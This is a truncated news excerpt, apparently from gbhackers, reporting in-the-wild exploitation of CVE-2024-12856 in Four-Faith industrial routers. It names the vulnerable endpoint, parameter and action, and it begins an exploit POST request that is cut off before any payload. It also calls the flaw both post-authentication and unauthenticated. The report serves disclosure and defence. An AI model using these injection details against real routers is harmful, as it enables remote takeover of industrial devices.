Four-Faith Industrial Routers Vulnerability Exploited in the Wild to Gain Remote Access
gbhackersA significant post-authentication vulnerability affecting Four-Faith industrial routers has been actively exploited in the wild.
Assigned as CVE-2024-12856, this flaw allows attackers to execute unauthenticated remote command injections by leveraging the routers’ default credentials.
Details of the Exploitation
The vulnerability impacts at least two Four-Faith router models—F3x24 and F3x36.
It involves leveraging the /apply.cgi endpoint over HTTP by exploiting the adj_time_year parameter during system time modifications using the submit_type=adjust_sys_time action.
2024 MITRE ATT&CK Evaluation Results for SMEs & MSPs -> Download Free Guide
Attackers have been able to inject OS commands, which can be used to gain unauthorized remote access or launch reverse shells. A real-world example of the malicious payload sent via a POST request is as follows:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko ...Copyright of this story solely belongs to gbhackers . To see the full text click HERE